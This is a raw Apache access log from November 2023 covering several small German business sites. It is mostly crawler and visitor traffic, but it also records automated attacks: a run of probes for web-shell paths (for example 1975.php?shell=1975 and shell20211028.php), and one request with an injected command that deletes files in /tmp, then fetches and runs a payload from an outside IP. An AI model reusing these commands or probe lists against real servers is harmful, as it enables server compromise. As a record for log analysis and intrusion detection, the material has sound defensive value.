188.34.179.0 - - [06/Nov/2023:19:02:25 +0100] "GET / HTTP/1.1" 200 95740 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
62.138.2.0 - - [06/Nov/2023:19:03:36 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.2.0 - - [06/Nov/2023:19:03:36 +0100] "GET /linieninformationen/ HTTP/1.1" 200 12429 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
156.54.11.0 - - [06/Nov/2023:19:04:04 +0100] "POST /wp-login.php HTTP/1.1" 503 7324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36"
71.6.134.0 - - [06/Nov/2023:19:06:28 +0100] "GET / HTTP/1.0" 400 362 "-" "-"
54.77.150.0 - - [06/Nov/2023:19:09:21 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.77.150.0 - - [06/Nov/2023:19:09:24 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
91.0.171.0 - - [06/Nov/2023:19:18:52 +0100] "GET / HTTP/1.1" 200 2590 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
91.0.171.0 - - [06/Nov/2023:19:18:52 +0100] "GET /assets/images/autogen/Spezialreinigung-_Hhighlighted_1_1.gif HTTP/1.1" 200 1750 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
91.0.171.0 - - [06/Nov/2023:19:18:52 +0100] "GET /assets/images/autogen/Kontakt_Nregular_1_1.gif HTTP/1.1" 200 1596 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
91.0.171.0 - - [06/Nov/2023:19:18:52 +0100] "GET /html/site.css HTTP/1.1" 200 88 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
91.0.171.0 - - [06/Nov/2023:19:18:52 +0100] "GET /html/fusion.css HTTP/1.1" 200 1161 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
91.0.171.0 - - [06/Nov/2023:19:18:52 +0100] "GET /html/style.css HTTP/1.1" 200 458 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
91.0.171.0 - - [06/Nov/2023:19:18:52 +0100] "GET /assets/rollover.js HTTP/1.1" 200 5145 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
:: - - [06/Nov/2023:19:18:58 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
91.134.248.0 - - [06/Nov/2023:19:22:12 +0100] "GET /wp-admin/css/network.php HTTP/1.1" 301 255 "http://simplesite.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
81.169.178.0 - - [06/Nov/2023:19:22:13 +0100] "POST /wp-cron.php?doing_wp_cron=1699294933.3083560466766357421875 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699294933.3083560466766357421875" "WordPress/5.8.8; https://www.ipcbusiness.de"
91.134.248.0 - - [06/Nov/2023:19:22:13 +0100] "GET /wp-admin/css/network.php HTTP/1.1" 200 - "http://ipcbusiness.de/wp-admin/css/network.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
91.134.248.0 - - [06/Nov/2023:19:22:13 +0100] "GET /wp-admin/css/network.php HTTP/1.1" 200 41052 "https://ipcbusiness.de/wp-admin/css/network.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4"
71.6.134.0 - - [06/Nov/2023:19:22:28 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
205.210.31.0 - - [06/Nov/2023:19:25:39 +0100] "GET / HTTP/1.1" 200 2691 "-" "-"
198.235.24.0 - - [06/Nov/2023:19:27:22 +0100] "GET / HTTP/1.0" 200 2691 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
199.45.154.0 - - [06/Nov/2023:19:28:30 +0100] "GET / HTTP/1.1" 400 226 "-" "-"
81.169.178.0 - - [06/Nov/2023:19:28:33 +0100] "POST /wp-cron.php?doing_wp_cron=1699295312.8146739006042480468750 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699295312.8146739006042480468750" "WordPress/5.2.19; https://www.computerdoc24.de"
199.45.154.0 - - [06/Nov/2023:19:28:32 +0100] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.0 - - [06/Nov/2023:19:28:35 +0100] "PRI * HTTP/2.0" 400 226 "-" "-"
81.169.178.0 - - [06/Nov/2023:19:28:37 +0100] "POST /wp-cron.php?doing_wp_cron=1699295317.8343529701232910156250 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699295317.8343529701232910156250" "WordPress/5.2.19; https://www.computerdoc24.de"
199.45.154.0 - - [06/Nov/2023:19:28:37 +0100] "GET / HTTP/1.1" 200 20479 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.0 - - [06/Nov/2023:19:28:41 +0100] "PRI * HTTP/2.0" 400 226 "-" "-"
199.45.154.0 - - [06/Nov/2023:19:28:42 +0100] "GET /wp-content/uploads/favicon-3.png HTTP/1.1" 200 944 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.0 - - [06/Nov/2023:19:28:44 +0100] "GET /wp-content/uploads/appleiphone-3.png HTTP/1.1" 200 3007 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.0 - - [06/Nov/2023:19:28:45 +0100] "GET /wp-content/uploads/appleiphoneretina-3.png HTTP/1.1" 200 5882 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.0 - - [06/Nov/2023:19:28:47 +0100] "GET /wp-content/uploads/appleipad-3.png HTTP/1.1" 200 3776 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.0 - - [06/Nov/2023:19:28:48 +0100] "GET /wp-content/uploads/appleipadretina-6.png HTTP/1.1" 200 7645 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.0 - - [06/Nov/2023:19:28:50 +0100] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
65.21.35.0 - - [06/Nov/2023:19:29:08 +0100] "GET /robots.txt HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:09 +0100] "GET /robots.txt HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:09 +0100] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:13 +0100] "GET /robots.txt HTTP/1.1" 200 67 "-" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:13 +0100] "GET / HTTP/1.1" 200 85226 "http://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:16 +0100] "GET /fernwartung/ HTTP/1.1" 200 42431 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:17 +0100] "GET /service/ HTTP/1.1" 200 86689 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:18 +0100] "GET /aktuelle-angebote/ HTTP/1.1" 200 53641 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:20 +0100] "GET /pc-ankauf/ HTTP/1.1" 200 47016 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:21 +0100] "GET /software/ HTTP/1.1" 200 40407 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:22 +0100] "GET /presse/ HTTP/1.1" 200 47338 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:23 +0100] "GET /kontakt/ HTTP/1.1" 200 47610 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:24 +0100] "GET /product/sandisk-usb-sticks-mit-schieber-16gb-10e-32gb-15e-64gb-20e-128gb-30e/ HTTP/1.1" 200 58428 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:25 +0100] "GET /product/logitech-mk270-wireless-desktop-combo/ HTTP/1.1" 200 61639 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:26 +0100] "GET /product/logitech-speaker-s-120-2-0-23w-rms/ HTTP/1.1" 200 59710 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:27 +0100] "GET /product/logitech-keyboard-k120-black-de/ HTTP/1.1" 200 62880 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:28 +0100] "GET /product/logitech-oem-optical-mouse-b100-black/ HTTP/1.1" 200 57961 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:29 +0100] "GET /impressum/ HTTP/1.1" 200 47280 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:30 +0100] "GET /datenschutzerklaerung/ HTTP/1.1" 200 84897 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:31 +0100] "GET /allgemeine-geschaeftsbedingungen/ HTTP/1.1" 200 46139 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:32 +0100] "GET /product-category/aktuelle-angebote/ HTTP/1.1" 200 53653 "https://www.computerdoc24.de/product/sandisk-usb-sticks-mit-schieber-16gb-10e-32gb-15e-64gb-20e-128gb-30e/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
65.21.35.0 - - [06/Nov/2023:19:29:33 +0100] "GET /product-category/aktuelle-angebote/tastatur-und-maus/ HTTP/1.1" 200 45876 "https://www.computerdoc24.de/product/logitech-mk270-wireless-desktop-combo/" "Mozilla/5.0 (compatible; SeekportBot; +https://bot.seekport.com)"
199.244.88.0 - - [06/Nov/2023:19:30:15 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
165.22.85.0 - - [06/Nov/2023:19:30:37 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
165.22.85.0 - - [06/Nov/2023:19:30:37 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
81.169.178.0 - - [06/Nov/2023:19:31:09 +0100] "POST /wp-cron.php?doing_wp_cron=1699295469.5245289802551269531250 HTTP/1.1" 200 - "http://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699295469.5245289802551269531250" "WordPress/5.2.19; https://www.computerdoc24.de"
45.79.191.0 - - [06/Nov/2023:19:31:09 +0100] "GET /wp-content/themes/signify/firkon.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:11 +0100] "GET /wp-content/themes/signify/firkon.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:12 +0100] "GET /wp-content/themes/signify/firkon.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:12 +0100] "GET /wp-content/themes/mero-megazines/ws.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:13 +0100] "GET /wp-content/themes/mero-megazines/ws.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:14 +0100] "GET /wp-content/themes/mero-megazines/ws.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:15 +0100] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:16 +0100] "GET /wp-admin/css/colors/coffee/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:17 +0100] "GET /wp-admin/css/colors/coffee/ HTTP/1.1" 403 2425 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:17 +0100] "GET /.well-known/acme-challenge/license.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:18 +0100] "GET /.well-known/acme-challenge/license.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:19 +0100] "GET /.well-known/acme-challenge/license.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:20 +0100] "GET /wp-content/plugins/envato-market/inc/class-envato-market-api.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:21 +0100] "GET /wp-content/plugins/envato-market/inc/class-envato-market-api.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:21 +0100] "GET /wp-content/plugins/envato-market/inc/class-envato-market-api.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:22 +0100] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:23 +0100] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:24 +0100] "GET /.well-known/acme-challenge/ HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:25 +0100] "GET /wp-includes/Requests/Text/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:26 +0100] "GET /wp-includes/Requests/Text/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:27 +0100] "GET /wp-includes/Requests/Text/ HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:27 +0100] "GET /wp-content/plugins/classic-editor/wp-login.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:28 +0100] "GET /wp-content/plugins/classic-editor/wp-login.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:29 +0100] "GET /wp-content/plugins/classic-editor/wp-login.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:30 +0100] "GET /radio.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:31 +0100] "GET /radio.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:32 +0100] "GET /radio.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:33 +0100] "GET //wp-content/plugins/fix/up.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:33 +0100] "GET //wp-content/plugins/fix/up.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:34 +0100] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:35 +0100] "GET /cjfuns.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
81.169.178.0 - - [06/Nov/2023:19:31:36 +0100] "POST /wp-cron.php?doing_wp_cron=1699295496.6842451095581054687500 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699295496.6842451095581054687500" "WordPress/5.2.19; https://www.computerdoc24.de"
45.79.191.0 - - [06/Nov/2023:19:31:36 +0100] "GET /cjfuns.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:38 +0100] "GET /cjfuns.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:38 +0100] "GET /1975.php?shell=1975 HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:39 +0100] "GET /1975.php?shell=1975 HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:40 +0100] "GET /1975.php?shell=1975 HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:41 +0100] "GET /shell20211028.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:42 +0100] "GET /shell20211028.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:43 +0100] "GET /shell20211028.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:43 +0100] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:44 +0100] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
45.79.191.0 - - [06/Nov/2023:19:31:45 +0100] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 200 11030 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
162.243.133.0 - - [06/Nov/2023:19:37:16 +0100] "GET / HTTP/1.0" 400 362 "-" "-"
128.14.209.0 - - [06/Nov/2023:19:39:27 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
67.217.57.0 - - [06/Nov/2023:19:50:14 +0100] "GET / HTTP/1.1" 403 2409 "-" "-"
45.55.0.0 - - [06/Nov/2023:19:53:20 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 zgrab/0.x"
197.33.203.0 - - [06/Nov/2023:19:55:00 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+91.92.243.35/jaws;sh+/tmp/jaws HTTP/1.1" 200 2691 "-" "Hello, world"
54.36.148.0 - - [06/Nov/2023:20:00:01 +0100] "GET /robots.txt HTTP/1.1" 404 2595 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [06/Nov/2023:20:00:02 +0100] "GET /index.html HTTP/1.1" 200 2590 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
81.169.178.0 - - [06/Nov/2023:20:00:39 +0100] "POST /wp-cron.php?doing_wp_cron=1699297238.9235789775848388671875 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699297238.9235789775848388671875" "WordPress/5.2.19; https://www.computerdoc24.de"
54.36.148.0 - - [06/Nov/2023:20:00:38 +0100] "GET /datenschutzerklaerung/ HTTP/1.1" 200 22864 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [06/Nov/2023:20:00:42 +0100] "GET /wp-content/plugins/js_composer/assets/lib/vc-tta-autoplay/vc-tta-autoplay.min.js HTTP/1.1" 200 809 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.0 - - [06/Nov/2023:20:00:42 +0100] "GET /wp-content/plugins/js_composer/assets/lib/vc_accordion/vc-accordion.min.js HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
81.169.178.0 - - [06/Nov/2023:20:01:37 +0100] "POST /wp-cron.php?doing_wp_cron=1699297296.8994131088256835937500 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699297296.8994131088256835937500" "WordPress/5.2.19; https://www.computerdoc24.de"
